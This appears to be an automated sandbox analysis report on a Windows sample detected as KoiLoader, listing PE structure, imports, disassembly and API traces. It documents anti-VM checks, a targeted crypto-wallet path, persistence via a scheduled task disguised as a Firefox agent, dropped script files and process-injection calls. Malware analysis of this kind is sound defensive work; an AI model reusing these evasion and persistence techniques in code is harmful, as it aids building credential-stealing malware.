Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007F70344FC2BCh
jmp 00007F70344FBD2Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041105Ch]
push dword ptr [ebp+08h]
call dword ptr [00411058h]
push C0000409h
call dword ptr [0041100Ch]
push eax
call dword ptr [00411014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00411060h]
test eax, eax
je 00007F70344FBEB7h
push 00000002h
pop ecx
int 29h
mov dword ptr [00418A78h], eax
mov dword ptr [00418A74h], ecx
mov dword ptr [00418A70h], edx
mov dword ptr [00418A6Ch], ebx
mov dword ptr [00418A68h], esi
mov dword ptr [00418A64h], edi
mov word ptr [00418A90h], ss
mov word ptr [00418A84h], cs
mov word ptr [00418A60h], ds
mov word ptr [00418A5Ch], es
mov word ptr [00418A58h], fs
mov word ptr [00418A54h], gs
pushfd
pop dword ptr [00418A88h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00418A7Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00418A80h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00418A8Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [004189C8h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17690	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x13c38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0x1130	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16698	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x165d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfbea	0xfc00	f80c6e36c0496492e658927e9cbd2f9a	False	0.5602368551587301	data	6.555752738036374	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x6d0c	0x6e00	06a44f2522af6deb8eae500514137c22	False	0.4388494318181818	OpenPGP Public Key	4.883697607623019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x163c	0xa00	b55402247df1a6c6692e0c2bccb8e505	False	0.1765625	data	2.3846615292625706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x13c38	0x13e00	f909621fde6f57064564af6430d44027	False	0.4939072327044025	data	4.867979029174927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0x1130	0x1200	6250f4910a879ac182f4b8379731bb76	False	0.7437065972222222	data	6.405937874038831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1a118	0x18c	data	English	United States	0.6464646464646465
RT_RCDATA	0x1a2a4	0x13	data	English	United States	1.4736842105263157
RT_RCDATA	0x1a2b8	0x13800	data	English	United States	0.4952549078525641
RT_MANIFEST	0x2dab8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	04:32:21
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\tcmeimnnMZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tcmeimnnMZ.exe"
Imagebase:	0x620000
File size:	182'272 bytes
MD5 hash:	B3E62E0DAF3ABE85E035558FED736E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	17.5%
Signature Coverage:	20.1%
Total number of Nodes:	1248
Total number of Limit Nodes:	9

Executed Functions

Function 00E48660 Relevance: 212.4, APIs: 77, Strings: 44, Instructions: 610
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00E4869E
StrStrIW.KERNELBASE(?,Hyper-V), ref: 00E486BD
StrStrIW.SHLWAPI(?,VMWare), ref: 00E486D3
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00E486E9
StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 00E486FF
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00E48714
GetModuleHandleA.KERNEL32(kernel32), ref: 00E4871F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48733
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4873E
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00E4876D
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00E48780
GetFileAttributesW.KERNELBASE(?), ref: 00E4878F
GetFileAttributesW.KERNEL32(?), ref: 00E487A1

Strings

%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 00E48B55
docx, xrefs: 00E48DBB
Harry Johnson, xrefs: 00E48BE4
xls, xrefs: 00E48DC7
sal.rosenburg, xrefs: 00E48BF2
kernel32, xrefs: 00E4871A
STRAZNJICA.GRUBUTT, xrefs: 00E48BCF
Wow64RevertWow64FsRedirection, xrefs: 00E48735
%systemroot%\System32\VBoxTray.exe, xrefs: 00E4877B
( , xrefs: 00E4882A, 00E48845
Files.docx, xrefs: 00E4883B
Paul Jones, xrefs: 00E48BD6
FORTI-PC, xrefs: 00E48C67
Resource.txt, xrefs: 00E488A4
Red Hat QXL controller, xrefs: 00E486F3
new songs.txt, xrefs: 00E48A5E
PJones, xrefs: 00E48BDD
BAIT, xrefs: 00E489F8, 00E48A0A
WILLCARTER-PC, xrefs: 00E48C5E
DESKTOP-ET51AJO, xrefs: 00E48C4B
%systemroot%\System32\VBoxService.exe, xrefs: 00E48768
ANNA-PC, xrefs: 00E48CD6
@, xrefs: 00E48C97
Recently.docx, xrefs: 00E4881C
OpenVPN.txt, xrefs: 00E488B3
powershell.exe, xrefs: 00E48E46
Bruno, xrefs: 00E48C39
Anna, xrefs: 00E48CC4
d5.vc/g, xrefs: 00E48C1F
Opened.docx, xrefs: 00E48823
SFTOR-PC, xrefs: 00E48C6E
Hyper-V, xrefs: 00E486B0
doc, xrefs: 00E48DAC
WDAGUtilityAccount, xrefs: 00E48BEB
xlsx, xrefs: 00E48DD3
Wow64DisableWow64FsRedirection, xrefs: 00E4872D
These.docx, xrefs: 00E4882D
VMWare, xrefs: 00E486C7
Parallels Display Adapter, xrefs: 00E486DD
7, xrefs: 00E48B02
7, xrefs: 00E48B89
Are.docx, xrefs: 00E48834
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 00E48B0C
Joe Cage, xrefs: 00E48BC8

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$( $7$7$@$ANNA-PC$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 4266617301-1396385811
Opcode ID: de237524478bf4acf1033df0f91d9dee89473dc92c7721bf7913c13e375a0142
Instruction ID: 159de5011824009576dc10c81765f7a78e3606f9744e21a7a225e2ac3f2e449e
Opcode Fuzzy Hash: de237524478bf4acf1033df0f91d9dee89473dc92c7721bf7913c13e375a0142
Instruction Fuzzy Hash: F6229E75D00219AFDF20CBA5ED48FEEB7BCAF45708F50159AE614F2190EB709A498F60

Function 00621300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0062132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00621343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00621439
GetProcAddress.KERNEL32(00000000), ref: 00621440
LoadLibraryA.KERNELBASE(?), ref: 00621459

Strings

kernel32, xrefs: 00621325, 00621434
LoadLibraryA, xrefs: 0062142F

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: 022bb5f2c6fceaf3a03599cc82ee8d2a927eb6e003a504c6f04a995a6d822c57
Instruction ID: ab8bca32f3308c3a9ac4d43f1130129594db3cff6b21cc8b5b06561bc5b2af3e
Opcode Fuzzy Hash: 022bb5f2c6fceaf3a03599cc82ee8d2a927eb6e003a504c6f04a995a6d822c57
Instruction Fuzzy Hash: 25D1F7B4E04629DFCB18CF98D894AEDB7B2FF59304F148159E406AB395D734A982CF50

Function 00622F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00622F77
GetLastError.KERNEL32 ref: 00622F81
ExitProcess.KERNEL32 ref: 00622F8E
BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00622F9D
GetCurrentProcess.KERNEL32(00000000), ref: 00622FA9
TerminateProcess.KERNEL32(00000000), ref: 00622FB0

Strings

jhl46745fghb, xrefs: 00622F98

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
String ID: jhl46745fghb
API String ID: 3772419538-1856006033
Opcode ID: 18894e015210280a6cbb12a65f22d5bb88f520cd325c05c87718265bf571f2eb
Instruction ID: 4d59bb135c48adf6f74dca94a36f88bd7aeea64e20791a5dadaef320d342cc2c
Opcode Fuzzy Hash: 18894e015210280a6cbb12a65f22d5bb88f520cd325c05c87718265bf571f2eb
Instruction Fuzzy Hash: C301B134A40318BFD764EFA0EE0AB9D77B6AF06701F0080A8F506AA1D1DF749944CF92

Function 00E48E60 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32 ref: 00E48E66
ExitProcess.KERNEL32 ref: 00E48F0E

Part of subcall function 00E48660: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00E4869E
Part of subcall function 00E48660: StrStrIW.KERNELBASE(?,Hyper-V), ref: 00E486BD
Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,VMWare), ref: 00E486D3
Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00E486E9
Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 00E486FF
Part of subcall function 00E48660: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00E48714
Part of subcall function 00E48660: GetModuleHandleA.KERNEL32(kernel32), ref: 00E4871F
Part of subcall function 00E48660: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48733
Part of subcall function 00E48660: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4873E
Part of subcall function 00E48660: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00E4876D
Part of subcall function 00E48660: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00E48780
Part of subcall function 00E48660: GetFileAttributesW.KERNELBASE(?), ref: 00E4878F
Part of subcall function 00E48660: GetFileAttributesW.KERNEL32(?), ref: 00E487A1

Part of subcall function 00E48380: InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2
Part of subcall function 00E48380: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
Part of subcall function 00E48380: StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
Part of subcall function 00E48380: wsprintfA.USER32 ref: 00E4843F
Part of subcall function 00E48380: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
Part of subcall function 00E48380: GetLastError.KERNEL32 ref: 00E4845E
Part of subcall function 00E48380: WSAStartup.WS2_32(00000202,?), ref: 00E4849C
Part of subcall function 00E48380: CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
Part of subcall function 00E48380: CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1

Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 00E471D1
Part of subcall function 00E471B0: lstrlenW.KERNEL32(?), ref: 00E471DA
Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 00E471F5
Part of subcall function 00E471B0: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00E47203
Part of subcall function 00E471B0: GetLastError.KERNEL32 ref: 00E4720D
Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 00E47224
Part of subcall function 00E471B0: wnsprintfW.SHLWAPI ref: 00E4723E
Part of subcall function 00E471B0: SetFileAttributesW.KERNEL32(?,00000006), ref: 00E4725E

Part of subcall function 00E48FC0: CryptGenRandom.ADVAPI32(00000020,?), ref: 00E48FD8
Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E49035
Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E4903C
Part of subcall function 00E48FC0: wsprintfA.USER32 ref: 00E4906F
Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490A8
Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E490AB
Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490B0
Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E490B3

Part of subcall function 00E47690: LsaOpenPolicy.ADVAPI32(00000000,00E4A060,00000001,?), ref: 00E476CC
Part of subcall function 00E47690: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00E476DF
Part of subcall function 00E47690: GetProcessHeap.KERNEL32(00000008,?), ref: 00E476FB
Part of subcall function 00E47690: HeapAlloc.KERNEL32(00000000), ref: 00E47702
Part of subcall function 00E47690: LsaFreeMemory.ADVAPI32(?), ref: 00E4773C
Part of subcall function 00E47690: LsaClose.ADVAPI32(?), ref: 00E47745
Part of subcall function 00E47690: GetComputerNameW.KERNEL32(?,?), ref: 00E47764
Part of subcall function 00E47690: GetUserNameW.ADVAPI32(?,00000101), ref: 00E47775

Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00E48591
Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00E485A4
Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E485B7
Part of subcall function 00E48570: GetFileAttributesW.KERNEL32(?), ref: 00E485DD
Part of subcall function 00E48570: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00E4860D
Part of subcall function 00E48570: wnsprintfW.SHLWAPI ref: 00E48630
Part of subcall function 00E48570: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00E48652

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
String ID:
API String ID: 1304186597-0
Opcode ID: d57b4baa0a32f576ff2a37c42c94b22d6f0357d04bd1a6d6b883072e984504bb
Instruction ID: db22a23d31ad7a015005cbe898589f4c2185fe11b01915fdd6318f5d228e9014
Opcode Fuzzy Hash: d57b4baa0a32f576ff2a37c42c94b22d6f0357d04bd1a6d6b883072e984504bb
Instruction Fuzzy Hash: 28015C5C70710A4ADE34B55876212BC2283DFC2325FC8A165BBD577DC5EE040E8B026F

Function 00621710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00621110: GetModuleHandleA.KERNEL32(kernel32), ref: 0062111B
Part of subcall function 00621110: GetModuleHandleW.KERNEL32(00000000), ref: 00621162

GetUserDefaultLCID.KERNELBASE ref: 00621824

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: HandleModule$DefaultUser
String ID:
API String ID: 3008646163-0
Opcode ID: 9c7918398ba9d52a130480caec1ff2e122979b3e2e8279a8b97ee2a306153f8d
Instruction ID: 38c88394aab9fc9f19608075cc50cdb66f7b1c15f41ac0ad7cb6cb32713278a2
Opcode Fuzzy Hash: 9c7918398ba9d52a130480caec1ff2e122979b3e2e8279a8b97ee2a306153f8d
Instruction Fuzzy Hash: CA4155B4E002199FCF44DF98E885AEEB7B2BF58304F148558E905BB341DB34AA41CFA5

Non-executed Functions

Function 00E46C00 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 00E46C1E
CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?,?,74DF0EE0), ref: 00E46C4B
SysAllocString.OLEAUT32(00E41498), ref: 00E46C91
SysFreeString.OLEAUT32(?), ref: 00E46CCE
SysAllocString.OLEAUT32(\Mozilla), ref: 00E46CDF
SysFreeString.OLEAUT32(00000000), ref: 00E46D01
SysAllocString.OLEAUT32(\Mozilla), ref: 00E46D12
SysFreeString.OLEAUT32(00000000), ref: 00E46D28
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46D36
SysFreeString.OLEAUT32(00000000), ref: 00E46D47
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 00E46D84
SysFreeString.OLEAUT32(00000000), ref: 00E46D93
SysAllocString.OLEAUT32(Mozilla), ref: 00E46D9A
SysFreeString.OLEAUT32(00000000), ref: 00E46DA9
SysAllocString.OLEAUT32(PT0S), ref: 00E46DFE
SysFreeString.OLEAUT32(00000000), ref: 00E46E0D
SysAllocString.OLEAUT32(Trigger1), ref: 00E46E7F
SysFreeString.OLEAUT32(00000000), ref: 00E46E8E
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 00E46E95
SysFreeString.OLEAUT32(00000000), ref: 00E46EA4
SysAllocString.OLEAUT32(PT1M), ref: 00E46EC3
SysFreeString.OLEAUT32(00000000), ref: 00E46ED2
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 00E46F53
SysFreeString.OLEAUT32(00000000), ref: 00E46F62
SysAllocString.OLEAUT32(?), ref: 00E46F6C
SysFreeString.OLEAUT32(00000000), ref: 00E46F7B
VariantInit.OLEAUT32(?), ref: 00E46FAA
SysAllocString.OLEAUT32(00E4113C), ref: 00E46FBE
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46FCF
SysFreeString.OLEAUT32(00000000), ref: 00E4700C
VariantClear.OLEAUT32(?), ref: 00E47012

Strings

2023-01-01T12:00:00, xrefs: 00E46E90
Mozilla, xrefs: 00E46D95
C:\Windows\System32\wscript.exe, xrefs: 00E46F4E
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 00E46D7F
Trigger1, xrefs: 00E46E7A
PT0S, xrefs: 00E46DF9
PT1M, xrefs: 00E46EBE
Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 00E46D31, 00E46FC0
\Mozilla, xrefs: 00E46CDA, 00E46D0D

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-711907784
Opcode ID: 6f7076799fc5dd9558de2444e4545adcaaf120cdc60fc2ee5b689ac7ae7d2a75
Instruction ID: 4cbd48a06624c4b4fa793c066247654b04b8f3d4ac67735d69debe5e9f7aab0e
Opcode Fuzzy Hash: 6f7076799fc5dd9558de2444e4545adcaaf120cdc60fc2ee5b689ac7ae7d2a75
Instruction Fuzzy Hash: 25F1FA70A00219AFDB14DFA9D988FAEBBF8EF49304F105198F505EB250DB71AD45CB61

Function 00E45EB0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 00E45ECD
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00E45EE1
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00E45EEC
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00E45EF7
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00E45F02
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00E45F0D
GetTempPathW.KERNEL32(000000F6,?), ref: 00E45F26

Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2

wnsprintfW.SHLWAPI ref: 00E45F61
PathCombineW.SHLWAPI(?,?,?), ref: 00E45F7B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00E45FA2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E45FC6
SetEndOfFile.KERNEL32(00000000), ref: 00E45FC9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E45FD6
wnsprintfW.SHLWAPI ref: 00E45FF4
RtlInitUnicodeString.NTDLL(?,?), ref: 00E4600A
RtlInitUnicodeString.NTDLL(?,?), ref: 00E46017
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 00E46056
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E460A5
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 00E460EF
FlushFileBuffers.KERNEL32(00000000), ref: 00E460F7
SetEndOfFile.KERNEL32(00000000), ref: 00E460FE
NtQueryInformationProcess.NTDLL ref: 00E46113
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00E4613B
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00E46192
